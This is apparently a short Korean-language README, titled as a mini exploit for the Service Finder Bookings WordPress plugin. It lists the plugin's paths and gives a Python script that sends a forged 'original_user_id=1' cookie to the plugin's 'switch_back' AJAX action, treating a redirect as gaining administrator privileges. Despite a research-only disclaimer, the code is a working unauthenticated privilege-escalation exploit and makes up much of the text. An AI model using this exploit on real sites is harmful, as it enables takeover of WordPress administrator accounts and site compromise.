
An mini exploit for the Service Finder -Bookings plugin WP
Service Finder 플러그인은 WordPress용 예약 및 서비스 관리 시스템입니다.
인기와 복잡성 때문에 일부 버전에서는 인증되지 않은 AJAX 엔드포인트 또는 부적절한 접근 제어와 관련된 보안 문제가 있었습니다.
이 README는 연구자들이 설치를 안전하게 식별하고 윤리적 관행(dbr krk)을 따르는 방법을 설명합니다.
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ 면책 조항:
이러한 검색은 교육 및 연구 목적으로만 사용하십시오. 무단 접근이나 익스플로잇을 시도하지 마십시오.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ 취약! 관리자 패널로 리디렉션 — 관리자(ADMIN) 권한 획득400-499: ⚠️ 클라이언트 오류 — 요청이 잘못되었거나 권한이 없음, 취약하지 않음